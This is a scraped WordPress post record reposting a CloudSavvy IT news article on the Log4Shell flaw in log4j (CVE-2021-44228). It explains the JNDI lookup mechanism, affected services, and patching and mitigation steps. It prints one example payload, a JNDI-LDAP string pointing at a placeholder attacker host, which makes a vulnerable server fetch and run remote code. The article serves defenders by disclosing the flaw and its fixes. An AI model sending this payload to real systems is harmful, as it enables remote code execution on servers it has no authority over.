{"id":379232,"date":"2021-12-10T17:16:36","date_gmt":"2021-12-10T14:16:36","guid":{"rendered":"https:\/\/en.buradabiliyorum.com\/critical-rce-zero-day-exploit-found-in-popular-java-logging-library-log4j-affects-much-of-the-internet-cloudsavvy-it\/"},"modified":"2021-12-10T17:16:36","modified_gmt":"2021-12-10T14:16:36","slug":"critical-rce-zero-day-exploit-found-in-popular-java-logging-library-log4j-affects-much-of-the-internet-cloudsavvy-it","status":"publish","type":"post","link":"https:\/\/buradabiliyorum.com\/en\/critical-rce-zero-day-exploit-found-in-popular-java-logging-library-log4j-affects-much-of-the-internet-cloudsavvy-it\/","title":{"rendered":"#Critical RCE Zero-Day Exploit Found in Popular Java Logging Library log4j, Affects Much Of The Internet \u2013 CloudSavvy IT"},"content":{"rendered":"<div id=\"article-content-area\">\n<p>A critical remote code execution vulnerability has been found in log4j, a very popular logging tool used by most of the 
industry. It\u2019s extremely severe, affecting nearly every server running Java, and is very simple to exploit, so you will want to update and mitigate the issue ASAP.<\/p>\n<h2 role=\"heading\" aria-level=\"2\"><span class=\"ez-toc-section\" id=\"How_Does_This_Work\"><\/span>How Does This Work?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>The bug, tracked by <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/github.com\/advisories\/GHSA-jfh8-c2jp-5v3q\">CVE-2021-44228<\/a>, likely affects almost any Java application using <code>log4j<\/code>, which is quite a few considering how ubiquitous it is. If your application ever logs a string sent in by a user, it\u2019s probably vulnerable. As far as exploits go, it\u2019s one of the worst ones this year, as it can target basically any server running Java in some fashion (though the primary attack vector may be harder on modern JDK versions, more on that below).<\/p>\n<p>Essentially, the exploit allows an attacker to send your server any string like the following, and if it logs it somewhere in your app, <em>your server will execute code hosted at that address<\/em>.<\/p>\n<pre>${jndi:ldap:\/\/attacker.com\/a}<\/pre>\n<p>This works because, when parsing this uniquely formatted string, <code>log4j<\/code>\u00a0will make a request through the <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/www.blackhat.com\/docs\/us-16\/materials\/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf\">Java Naming and Directory Interface<\/a>, which ends up sending a download request to an arbitrary endpoint. It downloads and deserializes the <code>.class<\/code>\u00a0file in an insecure manner. 
Because Java classes can have static initializers that run whenever the class is compiled and referenced, this results in remote arbitrary code execution from a simple, short string. For example, a client could set their user-agent to this string, or otherwise include it in a request, and when your server logs it, it will trigger the exploit.<\/p>\n<p>That\u2019s pretty horrible, scoring a 9.8 on the CVSS scale. It falls just shy of the worst score, as despite how awful it is, it doesn\u2019t affect any resources outside the scope of the targeted system (but does give application-level access to the server running the logger).<\/p>\n<p>It\u2019s going to affect a lot of applications. For example, Minecraft was one of the first to spread the news and patch the exploit, as it was possible to execute code both on servers and on all players connected to a server through the in-game chat messages. 
A hotfix update for the game was released to patch the bug.<\/p>\n<p>Popular services like Steam and iCloud have already been found to be vulnerable, and security research firm GreyNoise has already detected multiple IPs running scans for vulnerable servers.<\/p>\n<blockquote class=\"twitter-tweet\" data-width=\"550\" data-dnt=\"true\">\n<p lang=\"en\" dir=\"ltr\"><a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/twitter.com\/greynoise?ref_src=twsrc%5Etfw\">@GreyNoise<\/a> is currently seeing 2 unique IP&#8217;s scanning the internet for the new Apache Log4j RCE vulnerability (No CVE assigned yet).<br \/>A tag to track this activity on <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/t.co\/QckU3An40q\">https:\/\/t.co\/QckU3An40q<\/a> will be made available shortly and linked as a reply when released.<\/p>\n<p>\u2014 remy\ud83d\udc00 (@_mattata) <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/twitter.com\/_mattata\/status\/1469144854672379905?ref_src=twsrc%5Etfw\">December 10, 2021<\/a><\/p>\n<\/blockquote>\n<p>You\u2019re probably already running <code>log4j<\/code>, as it\u2019s included in hundreds of other libraries as the standard logging tool. However, JDK versions greater than\u00a0<code>6u211<\/code>,\u00a0<code>7u201<\/code>,\u00a0<code>8u191<\/code>, and\u00a0<code>11.0.1<\/code>\u00a0are not affected by the primary attack vector (using LDAP) that\u2019s being exploited right now. 
That isn\u2019t to say you shouldn\u2019t update, since the bug in <code>log4j<\/code>\u00a0+ JNDI is still severe, and can easily be <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/www.veracode.com\/blog\/research\/exploiting-jndi-injections-java\">used with other attack vectors as well<\/a>.<\/p>\n<h2 role=\"heading\" aria-level=\"2\"><span class=\"ez-toc-section\" id=\"How_Do_I_Fix_It\"><\/span>How Do I Fix It?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Luckily, there is already a fix that patches it entirely, so you should update your servers ASAP. This affects client applications as well though, which also need to update for this critical patch. After all, 3 billion devices run Java, so it\u2019s going to be a while before it\u2019s fully fixed.<\/p>\n<p>The exploit has already been patched in <a rel=\"nofollow noopener\" target=\"_blank\" href=\"https:\/\/github.com\/apache\/logging-log4j2\/releases\/tag\/log4j-2.15.0-rc2\"><code>log4j<\/code>\u2018s latest release, 2.15.0-rc2<\/a>, so you should update that if you can. The patch has also been backported to earlier versions, given the severity for users who may be stuck on legacy releases.<\/p>\n<p>If you\u2019re using another library that uses <code>log4j<\/code>, you should still be able to manually update in most cases, but if you can\u2019t, you can use this JVM flag to mitigate the issue, which simply tells <code>log4j<\/code>\u00a0to never do any lookups when formatting messages.<\/p>\n<pre>-Dlog4j2.formatMsgNoLookups=true<\/pre>\n<\/div>\n<p><span style=\"color: black;\"><a style=\"color: #ff9900;\" href=\"https:\/\/www.cloudsavvyit.com\/15042\/critical-rce-zero-day-exploit-found-in-popular-java-logging-library-log4j-affects-much-of-the-internet\/\" target=\"_blank\" rel=\"noopener\">Source<\/a><\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&#8220;#Critical RCE Zero-Day Exploit Found in Popular Java Logging Library log4j, Affects Much Of The Internet \u2013 CloudSavvy IT&#8221; A critical remote code execution vulnerability has been found in log4j, a very popular logging tool used by most of the industry. 
It\u2019s extremely severe, affecting nearly every server running Java, and is very simple to&#8230;<\/p>\n","protected":false},"author":1,"featured_media":379233,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/www.cloudsavvyit.com\/p\/uploads\/2021\/12\/ebdb98ee.png","fifu_image_alt":"","footnotes":""},"categories":[18],"tags":[],"class_list":["post-379232","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-technology"],"_links":{"self":[{"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/posts\/379232","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/comments?post=379232"}],"version-history":[{"count":0,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/posts\/379232\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/media\/379233"}],"wp:attachment":[{"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/media?parent=379232"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/categories?post=379232"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/buradabiliyorum.com\/en\/wp-json\/wp\/v2\/tags?post=379232"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}